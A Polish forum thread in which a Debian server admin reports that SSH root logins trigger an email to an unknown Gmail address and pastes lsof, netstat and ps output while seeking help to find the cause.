|
|
|
|
|
|
|
Podsłuch logowania ssh
tomii2 - 29-09-2009 19:12
Witam, zwracam się do was z pro¶b± o pomoc w rozwi±zaniu mojego problemu.
Problem polega na tym że za każdym razem gdy próbuje zalogować się na serwer poprzez ssh (putty) z serwera (z konta root) wysyłany jest mail na obcy adres (sniffps@gmail.com).
Nie muszę tłumaczyć tego jak to est niebezpieczne
Nie mogę znaleĽć Ľródła problemu.
System Debian Ech 4
POMOCY
KeFaS - 30-09-2009 02:49
Pokaż logi serwera i wyniki poleceń wykonanych jako root:
ps aux
netstat -a
lsof -i
tomii2 - 30-09-2009 07:59
Wyniki poleceń lsof -i
xxxxxxxxxxxxxxxxx:~# lsof -i
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
named 2119 bind 20u IPv6 5614 UDP *:domain
named 2119 bind 21u IPv6 5615 TCP *:domain (LISTEN)
named 2119 bind 22u IPv4 5617 UDP localhost:domain
named 2119 bind 23u IPv4 5618 TCP localhost:domain (LISTEN)
named 2119 bind 24u IPv4 5619 UDP xxxxxxxxxxxxxx:domain
named 2119 bind 25u IPv4 5620 TCP xxxxxxxxxxxxxx:domain (LISTEN)
named 2119 bind 26u IPv4 5621 UDP *:32768
named 2119 bind 27u IPv6 5622 UDP *:32769
named 2119 bind 28u IPv4 5623 TCP localhost:953 (LISTEN)
named 2119 bind 29u IPv6 5624 TCP ip6-localhost:953 (LISTEN)
postgrey 2138 postgrey 5u IPv4 5645 TCP localhost:60000 (LISTEN)
amavisd-n 2214 amavis 6u IPv4 5739 TCP localhost:10024 (LISTEN)
couriertc 2233 root 5u IPv6 5782 TCP *:pop3 (LISTEN)
couriertc 2247 root 3u IPv6 5802 TCP *:pop3s (LISTEN)
avahi-dae 2295 avahi 13u IPv4 6582 UDP *:mdns
avahi-dae 2295 avahi 14u IPv4 6583 UDP *:32771
jabberd 2304 jabber 7u IPv4 6608 TCP *:xmpp-client (LISTEN)
jabberd 2304 jabber 10u IPv4 6613 TCP *:xmpp-server (LISTEN)
jabberd 2307 jabber 7u IPv4 6608 TCP *:xmpp-client (LISTEN)
ntpd 2476 ntp 16u IPv4 7143 UDP *:ntp
ntpd 2476 ntp 17u IPv6 7144 UDP *:ntp
ntpd 2476 ntp 18u IPv6 7145 UDP [fe80::201:29ff:fe1b:1ff3]:ntp
ntpd 2476 ntp 19u IPv6 7146 UDP ip6-localhost:ntp
ntpd 2476 ntp 20u IPv4 7147 UDP localhost:ntp
ntpd 2476 ntp 21u IPv4 7148 UDP xxxxxxxxxxxxxx:ntp
proftpd 2515 proftpd 1u IPv4 7372 TCP *:iprop (LISTEN)
apache2 4865 root 3u IPv6 7490 TCP *:www (LISTEN)
apache2 4865 root 5u IPv6 7495 TCP *:https (LISTEN)
miniserv. 4891 root 6u IPv4 12327 TCP *:webmin (LISTEN)
miniserv. 4891 root 7u IPv4 12328 UDP *:10000
sshd 10456 root 3u IPv6 31396 TCP *:ssh (LISTEN)
amavisd-n 15366 amavis 6u IPv4 5739 TCP localhost:10024 (LISTEN)
sshd 16452 root 4u IPv6 47024 TCP xxxxxxxxxxxxxx:ssh->192.168.31.102:2317 (ESTABLISHED)
sshd 16462 informatyk 4u IPv6 47024 TCP xxxxxxxxxxxxxx:ssh->192.168.31.102:2317 (ESTABLISHED)
amavisd-n 16519 amavis 6u IPv4 5739 TCP localhost:10024 (LISTEN)
sshd 17642 root 4u IPv6 51447 TCP xxxxxxxxxxxxxx:ssh->192.168.31.102:2834 (ESTABLISHED)
sshd 17649 informatyk 4u IPv6 51447 TCP xxxxxxxxxxxxxx:ssh->192.168.31.102:2834 (ESTABLISHED)
master 17783 root 11u IPv4 51841 TCP *:smtp (LISTEN)
master 17783 root 98u IPv4 51956 TCP localhost:10025 (LISTEN)
couriertc 17802 root 3u IPv6 52117 TCP *:imap2 (LISTEN)
apache2 22503 www-data 3u IPv6 7490 TCP *:www (LISTEN)
apache2 22503 www-data 5u IPv6 7495 TCP *:https (LISTEN)
apache2 22531 www-data 3u IPv6 7490 TCP *:www (LISTEN)
apache2 22531 www-data 5u IPv6 7495 TCP *:https (LISTEN)
apache2 22531 www-data 15u IPv6 82113 TCP xxxxxxxxxxxxxx:www->jarsat-gw-serczernet.serczer.pl:1624 (ESTABLISHED)
apache2 23611 www-data 3u IPv6 7490 TCP *:www (LISTEN)
apache2 23611 www-data 5u IPv6 7495 TCP *:https (LISTEN)
apache2 23611 www-data 15u IPv6 82110 TCP xxxxxxxxxxxxxx:www->jarsat-gw-serczernet.serczer.pl:1616 (ESTABLISHED)
apache2 31138 www-data 3u IPv6 7490 TCP *:www (LISTEN)
apache2 31138 www-data 5u IPv6 7495 TCP *:https (LISTEN)
apache2 31138 www-data 15u IPv6 82111 TCP xxxxxxxxxxxxxx:www->jarsat-gw-serczernet.serczer.pl:1619 (ESTABLISHED)
apache2 31427 www-data 3u IPv6 7490 TCP *:www (LISTEN)
apache2 31427 www-data 5u IPv6 7495 TCP *:https (LISTEN)
apache2 31428 www-data 3u IPv6 7490 TCP *:www (LISTEN)
apache2 31428 www-data 5u IPv6 7495 TCP *:https (LISTEN)
apache2 31444 www-data 3u IPv6 7490 TCP *:www (LISTEN)
apache2 31444 www-data 5u IPv6 7495 TCP *:https (LISTEN)
apache2 31449 www-data 3u IPv6 7490 TCP *:www (LISTEN)
apache2 31449 www-data 5u IPv6 7495 TCP *:https (LISTEN)
apache2 32481 www-data 3u IPv6 7490 TCP *:www (LISTEN)
apache2 32481 www-data 5u IPv6 7495 TCP *:https (LISTEN)
apache2 32496 www-data 3u IPv6 7490 TCP *:www (LISTEN)
apache2 32496 www-data 5u IPv6 7495 TCP *:https (LISTEN)
apache2 32594 www-data 3u IPv6 7490 TCP *:www (LISTEN)
apache2 32594 www-data 5u IPv6 7495 TCP *:https (LISTEN)
[
netstat -a
xxxxxxxxxxxxx:~# netstat -a
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 localhost:60000 *:* LISTEN
tcp 0 0 *:xmpp-client *:* LISTEN
tcp 0 0 localhost:10024 *:* LISTEN
tcp 0 0 localhost:10025 *:* LISTEN
tcp 0 0 *:frox *:* LISTEN
tcp 0 0 *:webmin *:* LISTEN
tcp 0 0 xxxxxxxxxxxxxx:www jarsat-gw-serczer:49189 SYN_RECV
tcp 0 0 *:xmpp-server *:* LISTEN
tcp 0 0 czarnabialostock:domain *:* LISTEN
tcp 0 0 localhost:domain *:* LISTEN
tcp 0 0 *:smtp *:* LISTEN
tcp 0 0 localhost:953 *:* LISTEN
tcp 0 0 xxxxxxxxxxxxxx:54497 192.168.31.100:mysql TIME_WAIT
tcp6 0 0 *:pop3s *:* LISTEN
tcp6 0 0 *:pop3 *:* LISTEN
tcp6 0 0 *:imap2 *:* LISTEN
tcp6 0 0 *:www *:* LISTEN
tcp6 0 0 *:domain *:* LISTEN
tcp6 0 0 *:ssh *:* LISTEN
tcp6 0 0 ip6-localhost:953 *:* LISTEN
tcp6 0 0 *:https *:* LISTEN
tcp6 0 0 xxxxxxxxxxxxxx:www llf520039.crawl.y:45503 TIME_WAIT
tcp6 0 0 xxxxxxxxxxxxxx:www llf520039.crawl.y:45948 TIME_WAIT
tcp6 0 0 xxxxxxxxxxxxxx:www xxxxxxxxxxx.:2687 ESTABLISHED
tcp6 0 0 xxxxxxxxxxxxxx:www xxxxxxxxxxx.:2684 ESTABLISHED
tcp6 0 0 xxxxxxxxxxxxxx:www xxxxxxxxxx.:2685 ESTABLISHED
tcp6 0 0 xxxxxxxxxxxxxx:www xxxxxxxxxxx.:2683 ESTABLISHED
tcp6 0 1036 xxxxxxxxxxxxxx:ssh ::ffff:111.111.11.:2317 ESTABLISHED
tcp6 0 0 xxxxxxxxxxxxxx:ssh ::ffff:111.11.11.:2834 ESTABLISHED
tcp6 0 0 xxxxxxxxxxxxxx:www xxxxxxxx.:1061 ESTABLISHED
tcp6 0 0 xxxxxxxxxxxxxx:www xxxxxxxx.:1070 ESTABLISHED
tcp6 0 0 xxxxxxxxxxxxxx:www xxxxxxxx:63893 ESTABLISHED
udp 0 0 *:32768 *:*
udp 0 0 *:32771 *:*
udp 0 0 *:10000 *:*
udp 0 0 xxxxxxxxxxxxxxxx:domain *:*
udp 0 0 localhost:domain *:*
udp 0 0 *:mdns *:*
udp 0 0 xxxxxxxxxxxxxx:ntp *:*
udp 0 0 localhost:ntp *:*
udp 0 0 *:ntp *:*
udp6 0 0 *:32769 *:*
udp6 0 0 *:domain *:*
udp6 0 0 ip6-localhost:ntp *:*
udp6 0 0 fe80::201:29ff:fe1b:ntp *:*
udp6 0 0 *:ntp *:*
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path
unix 2 [ ACC ] STREAM LISTENING 5717 /var/run/acpid.socket
unix 2 [ ACC ] STREAM LISTENING 5770 /var/run/courier/authdaemon/socket.tmp
unix 2 [ ACC ] STREAM LISTENING 5822 /var/run/dbus/system_bus_socket
unix 2 [ ACC ] STREAM LISTENING 6578 /var/run/avahi-daemon/socket
unix 2 [ ACC ] STREAM LISTENING 73147 /var/run/aveserver
unix 2 [ ACC ] STREAM LISTENING 7368 /var/run/proftpd/proftpd.sock
unix 2 [ ACC ] STREAM LISTENING 5845 @/var/run/hald/dbus-AMKHi6V6hA
unix 2 [ ACC ] STREAM LISTENING 5843 @/var/run/hald/dbus-pcYEdeWtOd
unix 2 [ ] DGRAM 3241 @/org/kernel/udev/udevd
unix 2 [ ] DGRAM 5853 @/org/freedesktop/hal/udev_event
unix 2 [ ACC ] STREAM LISTENING 51847 public/cleanup
unix 2 [ ACC ] STREAM LISTENING 51854 private/tlsmgr
unix 2 [ ACC ] STREAM LISTENING 51858 private/rewrite
unix 2 [ ACC ] STREAM LISTENING 51862 private/bounce
unix 2 [ ACC ] STREAM LISTENING 51866 private/defer
unix 2 [ ACC ] STREAM LISTENING 51870 private/trace
unix 2 [ ACC ] STREAM LISTENING 51874 private/verify
unix 2 [ ACC ] STREAM LISTENING 51878 public/flush
unix 2 [ ACC ] STREAM LISTENING 51882 private/proxymap
unix 22 [ ] DGRAM 5572 /dev/log
unix 2 [ ACC ] STREAM LISTENING 51886 private/smtp
unix 2 [ ACC ] STREAM LISTENING 51890 private/relay
unix 2 [ ACC ] STREAM LISTENING 51894 public/showq
unix 2 [ ACC ] STREAM LISTENING 51898 private/error
unix 2 [ ACC ] STREAM LISTENING 51902 private/discard
unix 2 [ ACC ] STREAM LISTENING 51906 private/local
unix 2 [ ACC ] STREAM LISTENING 51910 private/virtual
unix 2 [ ACC ] STREAM LISTENING 51914 private/lmtp
unix 2 [ ACC ] STREAM LISTENING 51918 private/anvil
unix 2 [ ACC ] STREAM LISTENING 51922 private/scache
unix 2 [ ACC ] STREAM LISTENING 51926 private/maildrop
unix 2 [ ACC ] STREAM LISTENING 51930 private/uucp
unix 2 [ ACC ] STREAM LISTENING 51934 private/ifmail
unix 2 [ ACC ] STREAM LISTENING 51938 private/bsmtp
unix 2 [ ACC ] STREAM LISTENING 5737 /var/lib/amavis/amavisd.sock
unix 2 [ ACC ] STREAM LISTENING 51942 private/scalemail-backend
unix 2 [ ACC ] STREAM LISTENING 51946 private/mailman
unix 2 [ ACC ] STREAM LISTENING 51950 private/smtp-amavis
unix 2 [ ACC ] STREAM LISTENING 7005 /var/spool/postfix/var/run/saslauthd/mux
unix 2 [ ] DGRAM 78750
unix 2 [ ] DGRAM 52116
unix 2 [ ] DGRAM 52071
unix 2 [ ] DGRAM 51968
unix 3 [ ] STREAM CONNECTED 51958
unix 3 [ ] STREAM CONNECTED 51957
unix 3 [ ] STREAM CONNECTED 51953
unix 3 [ ] STREAM CONNECTED 51952
unix 3 [ ] STREAM CONNECTED 51949
unix 3 [ ] STREAM CONNECTED 51948
unix 3 [ ] STREAM CONNECTED 51945
unix 3 [ ] STREAM CONNECTED 51944
unix 3 [ ] STREAM CONNECTED 51941
unix 3 [ ] STREAM CONNECTED 51940
unix 3 [ ] STREAM CONNECTED 51937
unix 3 [ ] STREAM CONNECTED 51936
unix 3 [ ] STREAM CONNECTED 51933
unix 3 [ ] STREAM CONNECTED 51932
unix 3 [ ] STREAM CONNECTED 51929
unix 3 [ ] STREAM CONNECTED 51928
unix 3 [ ] STREAM CONNECTED 51925
unix 3 [ ] STREAM CONNECTED 51924
unix 3 [ ] STREAM CONNECTED 51921
unix 3 [ ] STREAM CONNECTED 51920
unix 3 [ ] STREAM CONNECTED 51917
unix 3 [ ] STREAM CONNECTED 51916
unix 3 [ ] STREAM CONNECTED 51913
unix 3 [ ] STREAM CONNECTED 51912
unix 3 [ ] STREAM CONNECTED 51909
unix 3 [ ] STREAM CONNECTED 51908
unix 3 [ ] STREAM CONNECTED 51905
unix 3 [ ] STREAM CONNECTED 51904
unix 3 [ ] STREAM CONNECTED 51901
unix 3 [ ] STREAM CONNECTED 51900
unix 3 [ ] STREAM CONNECTED 51897
unix 3 [ ] STREAM CONNECTED 51896
unix 3 [ ] STREAM CONNECTED 51893
unix 3 [ ] STREAM CONNECTED 51892
unix 3 [ ] STREAM CONNECTED 51889
unix 3 [ ] STREAM CONNECTED 51888
unix 3 [ ] STREAM CONNECTED 51885
unix 3 [ ] STREAM CONNECTED 51884
unix 3 [ ] STREAM CONNECTED 51881
unix 3 [ ] STREAM CONNECTED 51880
unix 3 [ ] STREAM CONNECTED 51877
unix 3 [ ] STREAM CONNECTED 51876
unix 3 [ ] STREAM CONNECTED 51873
unix 3 [ ] STREAM CONNECTED 51872
unix 3 [ ] STREAM CONNECTED 51869
unix 3 [ ] STREAM CONNECTED 51868
unix 3 [ ] STREAM CONNECTED 51865
unix 3 [ ] STREAM CONNECTED 51864
unix 3 [ ] STREAM CONNECTED 51861
unix 3 [ ] STREAM CONNECTED 51860
unix 3 [ ] STREAM CONNECTED 51857
unix 3 [ ] STREAM CONNECTED 51856
unix 3 [ ] STREAM CONNECTED 51853
unix 3 [ ] STREAM CONNECTED 51852
unix 3 [ ] STREAM CONNECTED 51850
unix 3 [ ] STREAM CONNECTED 51849
unix 3 [ ] STREAM CONNECTED 51846
unix 3 [ ] STREAM CONNECTED 51845
unix 3 [ ] STREAM CONNECTED 51843
unix 3 [ ] STREAM CONNECTED 51842
unix 2 [ ] DGRAM 51834
unix 3 [ ] STREAM CONNECTED 51484
unix 3 [ ] STREAM CONNECTED 51483
unix 2 [ ] DGRAM 47400
unix 3 [ ] STREAM CONNECTED 47088
unix 3 [ ] STREAM CONNECTED 47087
unix 2 [ ] DGRAM 45223
unix 2 [ ] DGRAM 12319
unix 2 [ ] DGRAM 12296
unix 3 [ ] STREAM CONNECTED 12218 @/var/run/hald/dbus-pcYEdeWtOd
unix 3 [ ] STREAM CONNECTED 12217
unix 2 [ ] DGRAM 7185
unix 2 [ ] DGRAM 7135
unix 2 [ ] DGRAM 7004
unix 3 [ ] STREAM CONNECTED 6581 /var/run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 6580
unix 3 [ ] STREAM CONNECTED 6575
unix 3 [ ] STREAM CONNECTED 6574
unix 2 [ ] DGRAM 6572
unix 3 [ ] STREAM CONNECTED 6554 /var/run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 6553
unix 3 [ ] STREAM CONNECTED 6324 /var/run/acpid.socket
unix 3 [ ] STREAM CONNECTED 6323
unix 3 [ ] STREAM CONNECTED 6318 @/var/run/hald/dbus-pcYEdeWtOd
unix 3 [ ] STREAM CONNECTED 6312
unix 3 [ ] STREAM CONNECTED 5848 @/var/run/hald/dbus-AMKHi6V6hA
unix 3 [ ] STREAM CONNECTED 5847
unix 3 [ ] STREAM CONNECTED 5825
unix 3 [ ] STREAM CONNECTED 5824
unix 2 [ ] DGRAM 5805
unix 2 [ ] DGRAM 5786
unix 2 [ ] DGRAM 5756
unix 2 [ ] DGRAM 5733
unix 2 [ ] DGRAM 5643
unix 2 [ ] DGRAM 5602
unix 2 [ ] DGRAM 5587
i ps -aux
xxxxxxxxxxxxxxxx:~# ps -aux
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 1944 564 ? Ss Sep29 0:01 init [2]
root 2 0.0 0.0 0 0 ? S Sep29 0:00 [migration/0]
root 3 0.0 0.0 0 0 ? SN Sep29 0:00 [ksoftirqd/0]
root 4 0.0 0.0 0 0 ? S< Sep29 0:00 [events/0]
root 5 0.0 0.0 0 0 ? S< Sep29 0:00 [khelper]
root 6 0.0 0.0 0 0 ? S< Sep29 0:00 [kthread]
root 9 0.0 0.0 0 0 ? S< Sep29 0:00 [kblockd/0]
root 10 0.0 0.0 0 0 ? S< Sep29 0:00 [kacpid]
root 83 0.0 0.0 0 0 ? S< Sep29 0:00 [kseriod]
root 117 0.0 0.0 0 0 ? S Sep29 0:00 [pdflush]
root 118 0.0 0.0 0 0 ? S Sep29 0:00 [pdflush]
root 119 0.0 0.0 0 0 ? S< Sep29 0:01 [kswapd0]
root 120 0.0 0.0 0 0 ? S< Sep29 0:00 [aio/0]
root 567 0.0 0.0 0 0 ? S< Sep29 0:00 [khubd]
root 881 0.0 0.0 0 0 ? S< Sep29 0:00 [kjournald]
root 1058 0.0 0.0 2532 308 ? S<s Sep29 0:00 udevd --daemon
root 1327 0.0 0.0 0 0 ? S< Sep29 0:00 [kpsmoused]
root 1356 0.0 0.0 0 0 ? S< Sep29 0:00 [kgameportd]
root 1548 0.0 0.0 0 0 ? S< Sep29 0:00 [kmirrord]
root 1583 0.0 0.0 0 0 ? S< Sep29 0:00 [kjournald]
root 1585 0.0 0.0 0 0 ? S< Sep29 0:00 [kjournald]
root 1587 0.0 0.0 0 0 ? S< Sep29 0:00 [kjournald]
root 2101 0.0 0.1 1628 628 ? Ss Sep29 0:00 /sbin/syslogd
root 2107 0.0 0.0 1580 292 ? Ss Sep29 0:00 /sbin/klogd -x
bind 2119 0.0 0.6 31000 2568 ? Ssl Sep29 0:08 /usr/sbin/named -u bind -t /var/lib/named
postgrey 2138 0.0 1.2 10648 4996 ? Ss Sep29 0:00 /usr/sbin/postgrey --pidfile=/var/run/postgrey.pid --daemonize --inet=127.0.0.1:60000 --greyl
root 2208 0.0 0.1 1576 460 ? Ss Sep29 0:00 /usr/sbin/acpid -c /etc/acpi/events -s /var/run/acpid.socket
amavis 2214 0.0 4.0 61064 15444 ? Ss Sep29 0:02 amavisd (master)
root 2218 0.0 0.0 1748 308 ? S Sep29 0:00 /usr/sbin/courierlogger -pid=/var/run/courier/authdaemon/pid -start /usr/lib/courier/courier-
root 2219 0.0 0.1 1904 432 ? S Sep29 0:00 /usr/lib/courier/courier-authlib/authdaemond
root 2225 0.0 0.1 2112 572 ? S Sep29 0:00 /usr/lib/courier/courier-authlib/authdaemond
root 2226 0.0 0.1 2112 480 ? S Sep29 0:00 /usr/lib/courier/courier-authlib/authdaemond
root 2227 0.0 0.1 2112 616 ? S Sep29 0:00 /usr/lib/courier/courier-authlib/authdaemond
root 2228 0.0 0.1 2112 572 ? S Sep29 0:00 /usr/lib/courier/courier-authlib/authdaemond
root 2229 0.0 0.1 2112 572 ? S Sep29 0:00 /usr/lib/courier/courier-authlib/authdaemond
root 2233 0.0 0.1 1852 464 ? S Sep29 0:00 /usr/sbin/couriertcpd -pid=/var/run/courier/pop3d.pid -stderrlogger=/usr/sbin/courierlogger -
root 2236 0.0 0.1 1748 448 ? S Sep29 0:00 /usr/sbin/courierlogger courierpop3login
root 2246 0.0 0.0 1748 244 ? S Sep29 0:00 /usr/sbin/courierlogger -pid=/var/run/courier/pop3d-ssl.pid -start -name=pop3d-ssl /usr/sbin/
root 2247 0.0 0.1 1852 436 ? S Sep29 0:00 /usr/sbin/couriertcpd -address=0 -maxprocs=40 -maxperip=4 -nodnslookup -noidentlookup 995 /us
103 2252 0.0 0.1 2244 388 ? Ss Sep29 0:00 /usr/bin/dbus-daemon --system
106 2260 0.0 0.2 5468 1088 ? Ss Sep29 0:01 /usr/sbin/hald
root 2261 0.0 0.1 2892 512 ? S Sep29 0:00 hald-runner
106 2267 0.0 0.1 2016 548 ? S Sep29 0:00 hald-addon-acpi: listening on acpid socket /var/run/acpid.socket
avahi 2295 0.0 0.2 2692 928 ? Ss Sep29 0:00 avahi-daemon: running [xxxxxxxxxxxxx.local]
avahi 2296 0.0 0.0 2556 208 ? Ss Sep29 0:00 avahi-daemon: chroot helper
jabber 2304 0.0 0.3 4624 1184 ? Ss Sep29 0:00 /usr/sbin/jabberd
jabber 2307 0.0 0.0 4548 348 ? S Sep29 0:00 /usr/sbin/jabberd
root 2393 0.0 0.1 7216 624 ? Ss Sep29 0:00 /usr/sbin/saslauthd -a shadow -c -m /var/spool/postfix/var/run/saslauthd -n 5
root 2394 0.0 0.2 7336 844 ? S Sep29 0:00 /usr/sbin/saslauthd -a shadow -c -m /var/spool/postfix/var/run/saslauthd -n 5
root 2395 0.0 0.2 7336 844 ? S Sep29 0:00 /usr/sbin/saslauthd -a shadow -c -m /var/spool/postfix/var/run/saslauthd -n 5
root 2396 0.0 0.2 7336 1116 ? S Sep29 0:00 /usr/sbin/saslauthd -a shadow -c -m /var/spool/postfix/var/run/saslauthd -n 5
root 2397 0.0 0.2 7336 1116 ? S Sep29 0:00 /usr/sbin/saslauthd -a shadow -c -m /var/spool/postfix/var/run/saslauthd -n 5
ntp 2476 0.0 0.2 4144 1044 ? Ss Sep29 0:00 /usr/sbin/ntpd -p /var/run/ntpd.pid -u 108:111 -g
arpwatch 2489 0.0 0.5 3632 2052 ? S Sep29 0:00 /usr/sbin/arpwatch -u arpwatch -N -p
root 2506 0.0 38.8 151380 149776 ? S Sep29 0:48 /opt/kav/5.5/kav4mailservers/bin/aveserver
proftpd 2515 0.0 0.1 9020 516 ? Ss Sep29 0:00 proftpd: (accepting connections)
daemon 2528 0.0 0.0 1824 308 ? Ss Sep29 0:00 /usr/sbin/atd
root 2535 0.0 0.1 2192 740 ? Ss Sep29 0:00 /usr/sbin/cron
106 4864 0.0 0.1 2012 556 ? S Sep29 0:00 hald-addon-keyboard: listening on /dev/input/event1
root 4865 0.0 1.1 38508 4616 ? Ss Sep29 0:01 /usr/sbin/apache2 -k start
root 4891 0.0 0.5 10424 2072 ? Ss Sep29 0:00 /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf
root 4902 0.0 0.1 1572 408 tty2 Ss+ Sep29 0:00 /sbin/getty 38400 tty2
root 4903 0.0 0.1 1576 408 tty3 Ss+ Sep29 0:00 /sbin/getty 38400 tty3
root 4904 0.0 0.1 1572 408 tty4 Ss+ Sep29 0:00 /sbin/getty 38400 tty4
root 4905 0.0 0.1 1572 408 tty5 Ss+ Sep29 0:00 /sbin/getty 38400 tty5
root 4910 0.0 0.1 1572 408 tty6 Ss+ Sep29 0:00 /sbin/getty 38400 tty6
root 5027 0.0 0.1 1576 408 tty1 Ss+ Sep29 0:00 /sbin/getty 38400 tty1
root 10456 0.0 0.1 4348 656 ? Ss Sep29 0:00 /usr/sbin/sshd
amavis 15366 0.0 11.0 71292 42464 ? S Sep29 0:33 amavisd (ch18-avail)
root 16452 0.0 0.3 7020 1272 ? Ss Sep29 0:00 sshd: ja [priv]
1008 16462 0.0 0.2 7048 1088 ? S Sep29 0:03 sshd: ja@pts/0
1008 16463 0.0 0.1 4296 596 pts/0 Ss Sep29 0:00 -bash
root 16482 0.0 0.1 2532 700 pts/0 S Sep29 0:00 su -
root 16483 0.0 0.3 4528 1228 pts/0 S Sep29 0:00 -su
amavis 16519 0.0 11.3 70704 43864 ? S Sep29 0:26 amavisd (ch17-avail)
root 17642 0.0 0.3 7020 1272 ? Ss Sep29 0:00 sshd: ja [priv]
1008 17649 0.0 0.2 6908 1048 ? S Sep29 0:00 sshd: ja@pts/1
1008 17650 0.0 0.1 4296 596 pts/1 Ss+ Sep29 0:00 -bash
root 17783 0.0 0.3 4812 1376 ? Ss Sep29 0:00 /usr/lib/postfix/master
postfix 17785 0.0 0.3 4932 1508 ? S Sep29 0:00 qmgr -l -t fifo -u
postfix 17794 0.0 0.3 4872 1476 ? S Sep29 0:00 tlsmgr -l -t unix -u -c
root 17801 0.0 0.0 1748 248 ? S Sep29 0:00 /usr/sbin/courierlogger -pid=/var/run/courier/imapd.pid -start -name=imapd /usr/sbin/couriert
root 17802 0.0 0.1 1852 436 ? S Sep29 0:00 /usr/sbin/couriertcpd -address=0 -maxprocs=40 -maxperip=20 -nodnslookup -noidentlookup 143 /u
postfix 31151 0.0 0.4 4820 1624 ? S 06:18 0:00 pickup -l -t fifo -u -c -o content_filter -o receive_override_options no_header_body_checks
www-data 32619 0.0 1.1 38632 4528 ? S 07:41 0:00 /usr/sbin/apache2 -k start
www-data 32620 0.4 1.8 40512 7064 ? S 07:41 0:02 /usr/sbin/apache2 -k start
www-data 32621 0.6 1.8 40504 7056 ? S 07:41 0:03 /usr/sbin/apache2 -k start
www-data 32636 0.2 1.8 40412 6964 ? S 07:44 0:01 /usr/sbin/apache2 -k start
www-data 32637 0.6 1.8 40496 7064 ? S 07:44 0:02 /usr/sbin/apache2 -k start
www-data 32638 0.0 0.6 38640 2604 ? S 07:45 0:00 /usr/sbin/apache2 -k start
www-data 32639 0.0 1.1 38632 4496 ? S 07:45 0:00 /usr/sbin/apache2 -k start
www-data 32640 0.0 0.6 38640 2596 ? S 07:45 0:00 /usr/sbin/apache2 -k start
www-data 32642 0.0 0.6 38640 2552 ? S 07:45 0:00 /usr/sbin/apache2 -k start
postfix 32645 0.0 0.4 4816 1576 ? S 07:46 0:00 anvil -l -t unix -u -c
www-data 32656 0.0 0.6 38640 2596 ? S 07:46 0:00 /usr/sbin/apache2 -k start
root 32687 0.0 0.2 3852 936 pts/0 R+ 07:51 0:00 ps -aux
O jakie dokładnie logi serwer chodzi?
zanotowane.pldoc.pisz.plpdf.pisz.plminister.pev.pl
|
|
|
|
